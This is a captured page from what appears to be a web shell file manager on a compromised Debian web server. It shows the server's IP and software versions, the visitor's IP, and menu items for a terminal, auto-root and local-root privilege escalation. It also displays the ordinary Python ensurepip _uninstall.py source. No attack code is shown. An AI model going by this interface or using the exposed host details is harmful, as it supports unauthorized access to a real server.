Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python2.7 /
ensurepip /
Delete
Unzip
Name
Size
Permission
Date
Action
__init__.py
8.37
KB
-rwxr-xr-x
2022-02-06 21:16
__init__.pyc
7.06
KB
-rw-r--r--
2022-03-20 10:36
__main__.py
67
B
-rw-r--r--
2022-02-06 21:16
__main__.pyc
223
B
-rw-r--r--
2022-03-20 10:36
_uninstall.py
780
B
-rw-r--r--
2022-02-06 21:16
_uninstall.pyc
1.06
KB
-rw-r--r--
2022-03-20 10:36
Save
Rename
"""Basic pip uninstallation support, helper for the Windows uninstaller""" import argparse import ensurepip def _main(argv=None): parser = argparse.ArgumentParser(prog="python -m ensurepip._uninstall") parser.add_argument( "--version", action="version", version="pip {}".format(ensurepip.version()), help="Show the version of pip this will attempt to uninstall.", ) parser.add_argument( "-v", "--verbose", action="count", default=0, dest="verbosity", help=("Give more output. Option is additive, and can be used up to 3 " "times."), ) args = parser.parse_args(argv) ensurepip._uninstall_helper(verbosity=args.verbosity) if __name__ == "__main__": _main()